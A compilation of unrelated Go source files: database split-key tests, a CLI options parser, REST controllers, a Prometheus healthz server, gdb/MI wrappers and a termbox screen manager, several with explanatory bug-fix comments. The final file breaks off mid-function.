		d.Record(now, 1, c1)
		k = d.MaybeSplitKey(now)
		if len(k) != 0 {
			break
		}
	}
	require.Equal(t, expK, k)
}
// TestDeciderIgnoresEnsureSafeSplitKeyOnError checks the fallback path: when
// keys.EnsureSafeSplitKey rejects the sampled key (here, keys with invalid
// family suffixes), the raw sampled key itself is used as the split key
// rather than suppressing the split.
func TestDeciderIgnoresEnsureSafeSplitKeyOnError(t *testing.T) {
	defer leaktest.AfterTest(t)()
	intn := rand.New(rand.NewSource(11)).Intn
	var d Decider
	Init(&d, intn, func() float64 { return 1.0 })
	baseKey := keys.SystemSQLCodec.TablePrefix(51)
	for i := 0; i < 4; i++ {
		baseKey = encoding.EncodeUvarintAscending(baseKey, uint64(52+i))
	}
	// These keys intentionally fail EnsureSafeSplitKey (suffix overflows int32).
	c0 := func() roachpb.Span {
		return roachpb.Span{Key: append([]byte(nil), encoding.EncodeUvarintAscending(baseKey, math.MaxInt32+1)...)}
	}
	c1 := func() roachpb.Span {
		return roachpb.Span{Key: append([]byte(nil), encoding.EncodeUvarintAscending(baseKey, math.MaxInt32+2)...)}
	}
	_, err := keys.EnsureSafeSplitKey(c1().Key)
	require.Error(t, err)
	var k roachpb.Key
	var now time.Time
	for i := 0; i < 2*int(minSplitSuggestionInterval/time.Second); i++ {
		now = now.Add(500 * time.Millisecond)
		d.Record(now, 1, c0)
		now = now.Add(500 * time.Millisecond)
		d.Record(now, 1, c1)
		k = d.MaybeSplitKey(now)
		if len(k) != 0 {
			break
		}
	}
	require.Equal(t, c1().Key, k)
}
|
package main
import (
"fmt"
"crypto/sha1"
"encoding/hex"
)
// userHashGenerator returns the hex-encoded SHA-1 digest of input.
func userHashGenerator(input string) string {
	h := sha1.New()
	h.Write([]byte(input))
	return hex.EncodeToString(h.Sum(nil))
}

// main prints the input together with the first 12 hex characters of its
// SHA-1 digest as a short user hash.
//
// BUG FIX: every line of the original was commented out, leaving the fmt,
// crypto/sha1 and encoding/hex imports unused — the file did not compile.
// The evidently intended logic is restored.
func main() {
	input := "dupa"
	fmt.Println(input, userHashGenerator(input)[0:12])
}
|
package options
import (
"flag"
"fmt"
"os"
"path/filepath"
"github.com/ssddanbrown/haste/loading"
)
// Options hold all the haste specific options available
type Options struct {
	Verbose bool // enable verbose progress output
	// Internal Services
	TemplateResolver loading.TemplateResolver // resolves template names to content
	// Manager Options
	OutPath            string   // absolute directory for generated output
	RootPath           string   // root directory for template resolution
	InputPaths         []string // files/directories to build
	BuildFileExtension string   // extension identifying buildable templates
	// Build Options
	TagPrefix    []byte // prefix marking template tags (e.g. "t:")
	VarTagPrefix []byte // prefix marking variable tags (e.g. "v:")
	VarTagOpen   []byte // opening delimiter for inline variables
	VarTagClose  []byte // closing delimiter for inline variables
	// Server options
	Watch      bool // watch input files and rebuild on change
	ServerPort int  // port for the dev server
	LiveReload bool // inject livereload when watching
}
// NewOptions provides a new set of options with defaults set.
func NewOptions() *Options {
	opts := new(Options)
	opts.BuildFileExtension = ".haste.html"
	opts.TagPrefix = []byte("t:")
	opts.VarTagPrefix = []byte("v:")
	opts.VarTagOpen = []byte("{{")
	opts.VarTagClose = []byte("}}")
	opts.Watch = false
	opts.ServerPort = 8081
	opts.LiveReload = true
	return opts
}
// LoadFileResolver wires a filesystem-backed template resolver, rooted at
// RootPath, into the options.
func (o *Options) LoadFileResolver() {
	templateResolver := loading.NewFileTemplateResolver(o.RootPath)
	o.TemplateResolver = templateResolver
}
// ParseCommandFlags to read user-provided input from the command-line
// and update the options with what's provided.
//
// BUG FIX: os.Getwd and filepath.Abs errors were previously ignored — and
// the Abs error inside the single-directory branch was lost entirely to an
// inner shadowed err from os.Stat. All of them are now checked.
func (o *Options) ParseCommandFlags() error {
	watch := flag.Bool("w", false, "Watch HTML file and auto-compile")
	port := flag.Int("p", 8081, "Provide a port to listen on")
	disableLiveReload := flag.Bool("l", false, "Disable livereload (When watching only)")
	verbose := flag.Bool("v", false, "Enable verbose output")
	distPtr := flag.String("d", "./dist/", "Output folder for generated content")
	rootPathPtr := flag.String("r", "./", "The root relative directory build path for template location")
	flag.Parse()

	o.Verbose = *verbose
	o.Watch = *watch
	o.ServerPort = *port
	o.LiveReload = !*disableLiveReload

	args := flag.Args()
	wd, err := os.Getwd()
	if err != nil {
		return err
	}
	rootPath, err := filepath.Abs(filepath.Join(wd, *rootPathPtr))
	if err != nil {
		return err
	}

	// If provided with directory use that as root build path
	if len(args) == 1 && *rootPathPtr == "./" {
		if stat, statErr := os.Stat(args[0]); statErr == nil && stat.IsDir() {
			rootPath, err = filepath.Abs(filepath.Join(wd, args[0]))
			if err != nil {
				return err
			}
		}
	}

	// Set output path
	outPath, err := filepath.Abs(filepath.Join(wd, *distPtr))
	if err != nil {
		return err
	}
	if err = createFolderIfNotExisting(outPath); err != nil {
		return err
	}

	o.RootPath = rootPath
	o.OutPath = outPath

	// Find files to load from args or use working directory
	var inputPaths []string
	if len(args) > 0 {
		for _, inputPath := range args {
			inputPaths = append(inputPaths, filepath.Join(wd, inputPath))
		}
	} else {
		inputPaths = append(inputPaths, wd)
	}
	o.InputPaths = inputPaths
	return nil
}
func createFolderIfNotExisting(folderPath string) error {
_, err := os.Stat(folderPath)
if !os.IsNotExist(err) {
return nil
}
parentFolder := filepath.Dir(folderPath)
info, err := os.Stat(parentFolder)
if os.IsNotExist(err) || !info.IsDir() {
return fmt.Errorf("Cannot find directory \"%s\" or it's parent directory", folderPath)
}
err = os.Mkdir(folderPath, 0777)
return err
}
|
package main
import (
"fmt"
"github.com/PROger4ever-Golang/Redis-serialization-benchmarks/implementations"
"reflect"
)
// ERROR_FORMAT is the shared log format: "<who>: error occured while <doing> - <err>".
const ERROR_FORMAT = "%s: error occured while %s - %s"

// main exercises every registered Redis serialization implementation with a
// full round-trip: Set/Get a whole object, Set/Get a single field, then Del,
// logging any mismatch or error and moving on to the next implementation.
func main() {
	app, err := NewApplication()
	if err != nil {
		// NOTE(review): if NewApplication returns a nil app alongside an
		// error, this ErrorLogger access would panic — confirm its contract.
		app.ErrorLogger.Printf(ERROR_FORMAT, "main", "configuring app", err)
		return
	}
	defer app.Finalize()
	for name, imp := range app.Implementations {
		// Start from a clean slate; the initial delete result is ignored.
		imp.Del()
		srcObject := &implementations.SerializationObject{
			String1: "String1", String2: "String2", String3: "String3", String4: "String4", String5: "String5",
			FieldX: "FieldX",
		}
		// Round-trip the full object and verify it survives unchanged.
		err = imp.Set(srcObject)
		if err != nil {
			app.ErrorLogger.Printf(ERROR_FORMAT, name, "setting object", err)
			continue
		}
		object1, err := imp.Get()
		if err != nil {
			app.ErrorLogger.Printf(ERROR_FORMAT, name, "getting object", err)
			continue
		}
		isEqual := reflect.DeepEqual(srcObject, object1)
		if !isEqual {
			app.ErrorLogger.Printf(ERROR_FORMAT, name, "comparing src srcObject and object1", "they aren't equal")
			continue
		}
		// Mutate a single field and verify partial update + read-back.
		srcObject.FieldX = "FieldX-changed"
		err = imp.SetOneField("FieldX", srcObject.FieldX)
		if err != nil {
			app.ErrorLogger.Printf(ERROR_FORMAT, name, "setting one field", err)
			continue
		}
		field, err := imp.GetOneField("FieldX")
		if err != nil {
			app.ErrorLogger.Printf(ERROR_FORMAT, name, "getting one field", err)
			continue
		}
		if field != srcObject.FieldX {
			app.ErrorLogger.Printf(ERROR_FORMAT, name, "comparing src field and actual field", "they aren't equal")
			continue
		}
		// The whole object read back should reflect the field update.
		object2, err := imp.Get()
		if err != nil {
			app.ErrorLogger.Printf(ERROR_FORMAT, name, "getting object", err)
			continue
		}
		isEqual = reflect.DeepEqual(srcObject, object2)
		if !isEqual {
			app.ErrorLogger.Printf(ERROR_FORMAT, name, "comparing src srcObject and object2", "they aren't equal")
			continue
		}
		err = imp.Del()
		if err != nil {
			app.ErrorLogger.Printf(ERROR_FORMAT, name, "deleting object", err)
			continue
		}
		fmt.Printf("%s, %+v\n", field, object1)
	}
}
|
package controllers
import (
"encoding/json"
"github.com/astaxie/beego"
"base_service/models"
"strconv"
)
// CategoriesController operations for Categories
// SpecificationsController exposes CRUD endpoints for product specifications.
type SpecificationsController struct {
	beego.Controller
}
// URLMapping registers this controller's handler methods with beego's router.
func (c *SpecificationsController) URLMapping() {
	c.Mapping("Post", c.Post)
	c.Mapping("Put", c.Put)
	c.Mapping("Delete", c.Delete)
	c.Mapping("GetOne", c.GetOne)
	c.Mapping("GetAll", c.GetAll)
}
// GetAll ...
// @Title Get All
// @Description get Categories
// @Param query query string false "Filter. e.g. col1:v1,col2:v2 ..."
// @Param fields query string false "Fields returned. e.g. col1,col2 ..."
// @Param sortby query string false "Sorted-by fields. e.g. col1,col2 ..."
// @Param order query string false "Order corresponding to each sortby field, if single value, apply to all sortby fields. e.g. desc,asc ..."
// @Param limit query string false "Limit the size of result set. Must be an integer"
// @Param offset query string false "Start position of result set. Must be an integer"
// @Success 200 {object} models.Categories
// @Failure 403
// @router / [get]
// Custom development-mode handler: lists specifications for a product.
func (c *SpecificationsController) GetAll() {
	beego.Debug("GetAll")
	// productID stays 0 when the query parameter is absent or invalid.
	var productID uint64
	if v, err := c.GetUint64("product_id"); err == nil {
		productID = v
	}
	c.Data["json"] = models.GetAllSpecifications(productID)
	c.ServeJSON()
}
// Post ...
// @Title Post
// @Description create Categories
// @Param body body models.Categories true "body for Categories content"
// @Success 201 {int} models.Categories
// @Failure 403 body is empty
// @router / [post]
func (c *SpecificationsController) Post() {
	beego.Debug("Post")
	// Decode the request body into a specification and persist it; a decode
	// failure is reported back as an error payload.
	var spec models.SpecificationsData
	if err := json.Unmarshal(c.Ctx.Input.RequestBody, &spec); err != nil {
		c.Data["json"] = models.MessageErrorUint64(0, err.Error())
	} else {
		c.Data["json"] = models.AddSpecifications(&spec)
	}
	c.ServeJSON()
}
// Put ...
// @Title Put
// @Description update the Categories
// @Param id path string true "The id you want to update"
// @Param body body models.Categories true "body for Categories content"
// @Success 200 {object} models.Categories
// @Failure 403 :id is not int
// @router /:id [put]
func (c *SpecificationsController) Put() {
	beego.Debug("Put")
	// An unparseable :id yields 0, matching the original lenient behavior.
	id, _ := strconv.ParseUint(c.Ctx.Input.Param(":id"), 10, 64)
	v := models.SpecificationsData{Id: id}
	if err := json.Unmarshal(c.Ctx.Input.RequestBody, &v); err != nil {
		c.Data["json"] = models.MessageErrorUint64(id, err.Error())
	} else {
		c.Data["json"] = models.UpdateSpecificationsById(&v)
	}
	c.ServeJSON()
}
// GetOne serves a single specification looked up by the :id path parameter.
func (c *SpecificationsController) GetOne() {
	beego.Debug("GetOne")
	id, _ := strconv.ParseUint(c.Ctx.Input.Param(":id"), 10, 64)
	c.Data["json"] = models.GetSpecificationsById(id)
	c.ServeJSON()
}
// Delete removes the specification identified by the :id path parameter and
// returns the model's result payload.
func (c *SpecificationsController) Delete() {
	beego.Debug("Delete")
	id, _ := strconv.ParseUint(c.Ctx.Input.Param(":id"), 10, 64)
	c.Data["json"] = models.DeleteSpecifications(id)
	c.ServeJSON()
}
|
package configs_test
import (
"io/ioutil"
"log"
"os"
"testing"
"github.com/gabrie30/joke/configs"
"github.com/mitchellh/go-homedir"
)
// TestConfigsDefault verifies that configs.DBPath defaults to ~/.jokes.db.
func TestConfigsDefault(t *testing.T) {
	got := configs.DBPath
	want, err := homedir.Dir()
	if err != nil {
		t.Fatalf("Could not determine users home dir, try again -- err: %v", err)
	}
	want = want + "/.jokes.db"
	if got != want {
		t.Fatalf("Could not correctly setup db path, got: %v, wanted: %v", got, want)
	}
}
// TestConfigsManuallySet verifies that configs.DBPath can be overridden at
// runtime by assigning a custom path.
//
// BUG FIX: the original deferred os.Remove(file.Name()) BEFORE checking err,
// so a TempFile failure would dereference a nil *os.File when evaluating the
// defer's arguments. The error is now checked first.
func TestConfigsManuallySet(t *testing.T) {
	file, err := ioutil.TempFile("", "test_joke_db")
	if err != nil {
		log.Fatal(err)
	}
	defer os.Remove(file.Name())
	configs.DBPath = file.Name()
	want := file.Name()
	got := configs.DBPath
	if got != want {
		t.Fatalf("Could not correctly setup db path, got: %v, wanted: %v", got, want)
	}
}
|
package admission
import (
"context"
"time"
"github.com/sirupsen/logrus"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/util/wait"
"k8s.io/client-go/kubernetes"
"github.com/harvester/harvester/pkg/webhook"
)
const (
	// PollingInterval is the delay between checks for the webhook configurations.
	PollingInterval = 5 * time.Second
	// PollingTimeout bounds how long Wait polls before giving up with an error.
	PollingTimeout = 3 * time.Minute
)
// Wait waits for the admission webhook server to register ValidatingWebhookConfiguration and MutatingWebhookConfiguration resources.
// It polls every PollingInterval, up to PollingTimeout, and returns nil once
// both configurations exist; any non-NotFound API error aborts the wait.
func Wait(ctx context.Context, clientSet *kubernetes.Clientset) error {
	return wait.PollImmediate(PollingInterval, PollingTimeout, func() (bool, error) {
		logrus.Infof("Waiting for ValidatingWebhookConfiguration %s...", webhook.ValidatingWebhookName)
		_, err := clientSet.AdmissionregistrationV1().ValidatingWebhookConfigurations().Get(ctx, webhook.ValidatingWebhookName, metav1.GetOptions{})
		if err != nil {
			// Not-found means the webhook server hasn't registered yet: keep polling.
			if apierrors.IsNotFound(err) {
				return false, nil
			}
			// Any other error aborts the poll loop immediately.
			return false, err
		}
		logrus.Infof("Waiting for MutatingWebhookConfiguration %s...", webhook.MutatingWebhookName)
		_, err = clientSet.AdmissionregistrationV1().MutatingWebhookConfigurations().Get(ctx, webhook.MutatingWebhookName, metav1.GetOptions{})
		if err != nil {
			if apierrors.IsNotFound(err) {
				return false, nil
			}
			return false, err
		}
		logrus.Infof("Admission webhooks are ready")
		return true, nil
	})
}
|
package nissan
import (
"fmt"
"strings"
"time"
)
// Auth models one step of the authentication flow: an authId plus a set of
// callbacks the client must fill in and send back.
type Auth struct {
	AuthID    string         `json:"authId"`
	Template  string         `json:"template"`
	Stage     string         `json:"stage"`
	Header    string         `json:"header"`
	Callbacks []AuthCallback `json:"callbacks"`
}
// AuthCallback is a single prompt in the auth flow; Output carries
// server-provided values, Input the values to send back.
type AuthCallback struct {
	Type   string              `json:"type"`
	Output []AuthCallbackValue `json:"output"`
	Input  []AuthCallbackValue `json:"input"`
}
// AuthCallbackValue is one name/value pair inside an AuthCallback.
type AuthCallbackValue struct {
	Name  string `json:"name"`
	Value string `json:"value"`
}
// Token is the result of completing the auth flow. On failure the same body
// is reused with Code/Reason/Message populated instead.
type Token struct {
	TokenID    string `json:"tokenId"`
	SuccessURL string `json:"successUrl"`
	Realm      string `json:"realm"`
	Code       int    `json:"code"`    // error response
	Reason     string `json:"reason"`  // error response
	Message    string `json:"message"` // error response
}
// SessionExpired reports whether the response message indicates an expired
// session (case-insensitive comparison against the server's message text).
func (t *Token) SessionExpired() bool {
	return strings.EqualFold(t.Message, "Session has timed out")
}
// Error converts an error response into a Go error. A zero Code marks a
// successful response, for which nil is returned.
func (t *Token) Error() error {
	if t.Code != 0 {
		return fmt.Errorf("%s: %s", t.Reason, t.Message)
	}
	return nil
}
// Vehicles is the list response of the vehicles endpoint.
type Vehicles struct {
	Data []Vehicle
}
// Vehicle describes one car attached to the account.
type Vehicle struct {
	VIN        string
	ModelName  string
	PictureURL string
}
// Request structure for kamereon api
type Request struct {
	Data Payload `json:"data"`
}
// Payload is the typed attribute bag carried inside a Request.
type Payload struct {
	Type       string                 `json:"type"`
	Attributes map[string]interface{} `json:"attributes,omitempty"`
}
// Error is a single kamereon api error entry.
type Error struct {
	Status, Code, Detail string
}
// StatusResponse structure for kamereon api
type StatusResponse struct {
	ID string
	Attributes
	Errors []Error
}
// Attributes carries battery/charging telemetry embedded in a
// StatusResponse. Units of the Remaining* fields are not visible here —
// presumably minutes; confirm against the kamereon api documentation.
type Attributes struct {
	ChargeStatus          float32   `json:"chargeStatus"`
	RangeHvacOff          int       `json:"rangeHvacOff"`
	BatteryLevel          int       `json:"batteryLevel"`
	BatteryCapacity       int       `json:"batteryCapacity"`
	BatteryTemperature    int       `json:"batteryTemperature"`
	PlugStatus            int       `json:"plugStatus"`
	LastUpdateTime        Timestamp `json:"lastUpdateTime"`
	ChargePower           int       `json:"chargePower"`
	RemainingTime         *int      `json:"chargingRemainingTime"`
	RemainingToFullFast   int       `json:"timeRequiredToFullFast"`
	RemainingToFullNormal int       `json:"timeRequiredToFullNormal"`
	RemainingToFullSlow   int       `json:"timeRequiredToFullSlow"`
}
// ActionResponse acknowledges an action request (e.g. battery refresh).
type ActionResponse struct {
	Data struct {
		Type, ID string // battery refresh
	} `json:"data"`
	Errors []Error
}
const timeFormat = "2006-01-02T15:04:05Z"
// Timestamp implements JSON unmarshal
type Timestamp struct {
time.Time
}
// UnmarshalJSON decodes string timestamp into time.Time
func (ct *Timestamp) UnmarshalJSON(data []byte) error {
s := strings.Trim(string(data), "\"")
t, err := time.Parse(timeFormat, s)
if err == nil {
(*ct).Time = t
}
return err
}
|
package inner
import (
"net"
"reflect"
"testing"
)
// Test1 dials a local TCP listener on :3333 and logs the concrete type of
// the returned connection. It is exploratory scaffolding: the commented-out
// checks probe whether the connection implements io.WriterTo / io.ReaderFrom.
//
// NOTE(review): the test needs something listening on :3333; without a
// listener DialTCP fails and the test is marked failed via t.Error (conn is
// then a typed nil, which t.Log still prints safely).
func Test1(t *testing.T) {
	addr, _ := net.ResolveTCPAddr("tcp", ":3333")
	conn, err := net.DialTCP("tcp", nil, addr)
	if err != nil {
		t.Error(err)
	}
	t.Log(reflect.TypeOf(conn))
	// conn.Re
	// if _, ok := conn.(io.WriterTo); ok {
	// logger.Debug("WriterTo")
	// }
	// Similarly, if the writer has a ReadFrom method, use it to do the copy.
	// if _, ok := conn.(io.ReaderFrom); ok {
	// logger.Debug("ReaderFrom")
	// }
}
|
package main
import (
"net/http"
"strings"
"github.com/labstack/echo"
"github.com/labstack/echo/middleware"
"github.com/pkg/errors"
kingpin "gopkg.in/alecthomas/kingpin.v2"
"github.com/previousnext/prometheus-healthz/internal/prometheus"
)
// Environment variables that override the corresponding CLI flags.
const (
	// EnvarPort for overriding the default port.
	EnvarPort = "PROMETHEUS_HEALTHZ_PORT"
	// EnvarPath for overriding the default path.
	EnvarPath = "PROMETHEUS_HEALTHZ_PATH"
	// EnvarQuery for overriding the default query.
	EnvarQuery = "PROMETHEUS_HEALTHZ_QUERY"
	// EnvarURI for overriding the default URI.
	EnvarURI = "PROMETHEUS_HEALTHZ_URI"
	// EnvarUsername for overriding the default username.
	EnvarUsername = "PROMETHEUS_HEALTHZ_USERNAME"
	// EnvarPassword for overriding the default password.
	EnvarPassword = "PROMETHEUS_HEALTHZ_PASSWORD"
)
// Command line flags. Each can be overridden by its PROMETHEUS_HEALTHZ_*
// environment variable. (The query help text previously duplicated the
// username help, and "serve"/"Prometheus" were misspelled.)
var (
	cliPort     = kingpin.Flag("port", "Port which to serve requests").Default(":80").Envar(EnvarPort).String()
	cliPath     = kingpin.Flag("path", "Path which to serve requests").Default("/healthz").Envar(EnvarPath).String()
	cliQuery    = kingpin.Flag("query", "Label query used to select healthz rules").Default("type=healthz").Envar(EnvarQuery).String()
	cliURI      = kingpin.Flag("uri", "Prometheus endpoint").Default("http://127.0.0.1:9090").Envar(EnvarURI).String()
	cliUsername = kingpin.Flag("username", "Username used for basic authentication").Required().Envar(EnvarUsername).String()
	cliPassword = kingpin.Flag("password", "Password used for basic authentication").Required().Envar(EnvarPassword).String()
)
// main starts an echo server that exposes a single basic-auth protected
// healthz endpoint. Each request queries Prometheus for rules, filters them
// by the configured label query, and returns 500 with the firing rule names
// or 200 when none are firing.
func main() {
	kingpin.Parse()
	e := echo.New()
	e.Use(middleware.LoggerWithConfig(middleware.LoggerConfig{
		Format: "method=${method}, uri=${uri}, status=${status}\n",
	}))
	// Constant-value basic auth sourced from flags/environment.
	e.Use(middleware.BasicAuth(func(username, password string, c echo.Context) (bool, error) {
		if username == *cliUsername && password == *cliPassword {
			return true, nil
		}
		return false, nil
	}))
	e.GET(*cliPath, func(c echo.Context) error {
		// A fresh Prometheus client per request; any failure maps to 500.
		client, err := prometheus.New(*cliURI)
		if err != nil {
			return c.String(http.StatusInternalServerError, err.Error())
		}
		rules, err := client.Rules()
		if err != nil {
			return c.String(http.StatusInternalServerError, err.Error())
		}
		filtered, err := getHealthzRules(*cliQuery, rules)
		if err != nil {
			return c.String(http.StatusInternalServerError, err.Error())
		}
		// Any firing healthz rule makes the cluster unhealthy.
		if len(filtered) > 0 {
			return c.JSON(http.StatusInternalServerError, Response{State: StateUnhealthy, Rules: filtered})
		}
		return c.JSON(http.StatusOK, Response{State: StateHealthy})
	})
	e.Logger.Fatal(e.Start(*cliPort))
}
// getHealthzRules returns the names of rules that are firing AND carry every
// label in the query.
//
// BUG FIX: the original inner loop's `continue` only continued the label
// loop itself (whose body did nothing else), so label filtering was a no-op
// and every firing rule was reported regardless of its labels.
func getHealthzRules(query string, resp prometheus.RulesResponse) ([]string, error) {
	var rules []string
	labels, err := getLabels(query)
	if err != nil {
		return rules, errors.Wrap(err, "failed to get labels from query")
	}
	for _, group := range resp.Data.Groups {
		for _, rule := range group.Rules {
			if !hasAllLabels(labels, rule) {
				continue
			}
			if !isFiring(rule) {
				continue
			}
			rules = append(rules, rule.Name)
		}
	}
	return rules, nil
}

// hasAllLabels reports whether rule carries every required key/value pair.
func hasAllLabels(labels map[string]string, rule prometheus.Rule) bool {
	for key, value := range labels {
		if !hasLabel(key, value, rule) {
			return false
		}
	}
	return true
}
// hasLabel reports whether rule carries the given label with exactly the
// given value (an absent label never matches, even for an empty value).
func hasLabel(label, value string, rule prometheus.Rule) bool {
	val, ok := rule.Labels[label]
	return ok && val == value
}
// isFiring reports whether at least one alert attached to the rule is in the
// firing state.
func isFiring(rule prometheus.Rule) bool {
	for i := range rule.Alerts {
		if rule.Alerts[i].State == prometheus.StateFiring {
			return true
		}
	}
	return false
}
// getLabels parses a comma-separated "key=value" query into a map. Items
// that do not split into exactly one key and one value are silently skipped.
// The error return is kept for interface stability; it is always nil.
func getLabels(query string) (map[string]string, error) {
	labels := make(map[string]string)
	for _, pair := range strings.Split(query, ",") {
		parts := strings.Split(pair, "=")
		if len(parts) != 2 {
			continue
		}
		labels[parts[0]] = parts[1]
	}
	return labels, nil
}
|
// Copyright 2013 Chris McGee <sirnewton_01@yahoo.ca>. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package gdblib
import ()
// ExecRunParms configures ExecRun: run all inferiors (AllInferiors) or a
// single thread group (ThreadGroup). AllInferiors takes precedence.
type ExecRunParms struct {
	ThreadGroup  string
	AllInferiors bool
}

// ExecRun starts the debuggee via gdb/MI -exec-run, interrupting the gdb
// interpreter first if necessary (forceInterrupt).
func (gdb *GDB) ExecRun(parms ExecRunParms) error {
	cmd := "-exec-run"
	switch {
	case parms.AllInferiors:
		cmd += " --all"
	case parms.ThreadGroup != "":
		cmd += " --thread-group " + parms.ThreadGroup
	}
	descriptor := cmdDescr{
		forceInterrupt: true,
		cmd:            cmd,
		response:       make(chan cmdResultRecord),
	}
	gdb.input <- descriptor
	return parseResult(<-descriptor.response, nil)
}
// ExecArgsParms carries the argument string for -exec-arguments.
type ExecArgsParms struct {
	Args string
}

// ExecArgs sets the command line arguments handed to the debuggee on its
// next run via gdb/MI -exec-arguments.
func (gdb *GDB) ExecArgs(parms ExecArgsParms) error {
	descriptor := cmdDescr{
		cmd:      "-exec-arguments " + parms.Args,
		response: make(chan cmdResultRecord),
	}
	gdb.input <- descriptor
	return parseResult(<-descriptor.response, nil)
}
// ExecInterruptParms is currently empty; the fields below are retained as a
// sketch of a possible targeted-interrupt API.
type ExecInterruptParms struct {
	// ThreadGroup string
	// AllInferiors bool
}
// ExecInterrupt pauses all running threads. It works by sending an empty
// command with forceInterrupt set rather than -exec-interrupt (see the
// retained commented-out variant); no result record is read back.
func (gdb *GDB) ExecInterrupt(parms ExecInterruptParms) /*error*/ {
	descriptor := cmdDescr{forceInterrupt: true}
	// An interrupt is handled in a special way with an empty
	// command that forces interrupt. This will interrupt all
	// threads and make the gdb interpreter responsive to
	// commands.
	descriptor.cmd = ""
	// descriptor.cmd = "-exec-interrupt"
	// if parms.AllInferiors {
	// descriptor.cmd = descriptor.cmd + " --all"
	// } else if parms.ThreadGroup != "" {
	// descriptor.cmd = descriptor.cmd + " --thread-group " + parms.ThreadGroup
	// }
	// descriptor.response = make(chan cmdResultRecord)
	gdb.input <- descriptor
	// result := <-descriptor.response
	// err := parseResult(result, nil)
	// return err
}
// ExecNextParms configures ExecNext; Reverse steps backwards on targets that
// support reverse execution.
type ExecNextParms struct {
	Reverse bool
}

// ExecNext advances one source line, stepping over function calls
// (gdb/MI -exec-next).
func (gdb *GDB) ExecNext(parms ExecNextParms) error {
	cmd := "-exec-next"
	if parms.Reverse {
		cmd += " --reverse"
	}
	descriptor := cmdDescr{
		cmd:      cmd,
		response: make(chan cmdResultRecord),
	}
	gdb.input <- descriptor
	return parseResult(<-descriptor.response, nil)
}
// ExecStepParms configures ExecStep; Reverse steps backwards on targets that
// support reverse execution.
type ExecStepParms struct {
	Reverse bool
}

// ExecStep advances one source line, stepping into function calls
// (gdb/MI -exec-step).
func (gdb *GDB) ExecStep(parms ExecStepParms) error {
	cmd := "-exec-step"
	if parms.Reverse {
		cmd += " --reverse"
	}
	descriptor := cmdDescr{
		cmd:      cmd,
		response: make(chan cmdResultRecord),
	}
	gdb.input <- descriptor
	return parseResult(<-descriptor.response, nil)
}
// ExecContinueParms configures ExecContinue. AllInferiors takes precedence
// over ThreadGroup; Reverse continues backwards where supported.
type ExecContinueParms struct {
	Reverse      bool
	ThreadGroup  string
	AllInferiors bool
}

// ExecContinue resumes execution via gdb/MI -exec-continue.
func (gdb *GDB) ExecContinue(parms ExecContinueParms) error {
	cmd := "-exec-continue"
	if parms.Reverse {
		cmd += " --reverse"
	}
	switch {
	case parms.AllInferiors:
		cmd += " --all"
	case parms.ThreadGroup != "":
		cmd += " --thread-group " + parms.ThreadGroup
	}
	descriptor := cmdDescr{
		cmd:      cmd,
		response: make(chan cmdResultRecord),
	}
	gdb.input <- descriptor
	return parseResult(<-descriptor.response, nil)
}
|
// +build windows
package termboxScreen
import (
"errors"
"fmt"
"time"
termbox "github.com/nsf/termbox-go"
)
const (
	// NoRefresh disables the automatic refresh ticker (see SetRefreshRate).
	NoRefresh = 0
)
// Screen is one displayable page managed by Manager. The event handlers
// return the id of the screen that should be displayed next.
type Screen interface {
	Id() int
	Initialize(Bundle) error
	HandleKeyEvent(termbox.Event) int
	HandleNoneEvent(termbox.Event) int
	DrawScreen()
	ResizeScreen()
}
// Manager owns the termbox lifecycle, the registered screens, and the event
// loop that dispatches termbox events to the active screen.
type Manager struct {
	defaultFg       termbox.Attribute // default foreground attribute
	defaultBg       termbox.Attribute // background used by drawBackground
	screens         map[int]Screen    // registered screens keyed by Id()
	displayScreenId int               // id of the currently active screen
	events          chan termbox.Event
	running         bool
	refreshRate     time.Duration // period of synthetic EventNone injection; NoRefresh disables
}
// NewManager constructs a Manager with white-on-black defaults, no screens,
// and automatic refresh disabled, then initializes termbox in 256-color
// output mode.
//
// NOTE(review): on termbox.Init failure the error is only printed and nil is
// returned — callers must nil-check the result.
func NewManager() *Manager {
	m := Manager{
		defaultFg:   termbox.ColorWhite,
		defaultBg:   termbox.ColorBlack,
		events:      make(chan termbox.Event),
		screens:     make(map[int]Screen),
		refreshRate: NoRefresh,
	}
	if err := termbox.Init(); err != nil {
		fmt.Println("Error initializing termbox")
		return nil
	}
	termbox.SetOutputMode(termbox.Output256)
	return &m
}
// SetDefaultFg stores the default foreground attribute.
func (m *Manager) SetDefaultFg(c termbox.Attribute) { m.defaultFg = c }

// SetDefaultBg stores the background attribute used when clearing the screen.
func (m *Manager) SetDefaultBg(c termbox.Attribute) { m.defaultBg = c }
// AddScreen adds a screen to the screens map, they're indexed by the value
// returned from the screen's Id() function.
func (m *Manager) AddScreen(s Screen) {
	m.screens[s.Id()] = s
	// If this is the only screen we've added, set it to active
	if len(m.screens) == 1 {
		m.SetDisplayScreen(s.Id())
	}
}
// AddAndInitializeScreen adds a screen just like AddScreen, but then
// calls its 'Initialize' function with a blank bundle.
func (m *Manager) AddAndInitializeScreen(s Screen) error {
	m.AddScreen(s)
	return m.InitializeScreen(s.Id(), Bundle{})
}
// GetScreens returns the internal id → Screen map (not a copy; callers can
// mutate it).
func (m *Manager) GetScreens() map[int]Screen {
	return m.screens
}
// SetDisplayScreen makes the screen registered under id the active one.
// Switching to the already-active screen is a no-op; an unknown id yields an
// error. (Rewrote the `var ok bool` + separate lookup into the idiomatic
// inline comma-ok form.)
func (m *Manager) SetDisplayScreen(id int) error {
	if id == m.displayScreenId {
		return nil
	}
	if _, ok := m.screens[id]; !ok {
		return errors.New("Invalid Screen Id")
	}
	m.displayScreenId = id
	return nil
}
// InitializeScreen initializes the screen registered under id with the given
// Bundle, or returns an error when no such screen exists. (Single map lookup
// replaces the original's existence check followed by a second lookup.)
func (m *Manager) InitializeScreen(id int, b Bundle) error {
	if s, ok := m.screens[id]; ok {
		return s.Initialize(b)
	}
	return errors.New("Invalid screen id")
}
// Loop runs the event loop until Ctrl-C is pressed or a handler returns an
// unregistered screen id. It redraws the active screen after every handled
// event and tears down termbox on exit.
//
// NOTE(review): pollUserEvents may still be blocked in PollEvent when Loop
// closes m.events; a subsequent send on the closed channel would panic —
// confirm the intended shutdown order.
func (m *Manager) Loop() error {
	if len(m.screens) == 0 {
		return errors.New("Loop cannot run without screens")
	}
	m.running = true
	go m.pollUserEvents()
	// We always start display the first screen added
	m.layoutAndDrawScreen()
	for {
		event := <-m.events
		if event.Type == termbox.EventKey {
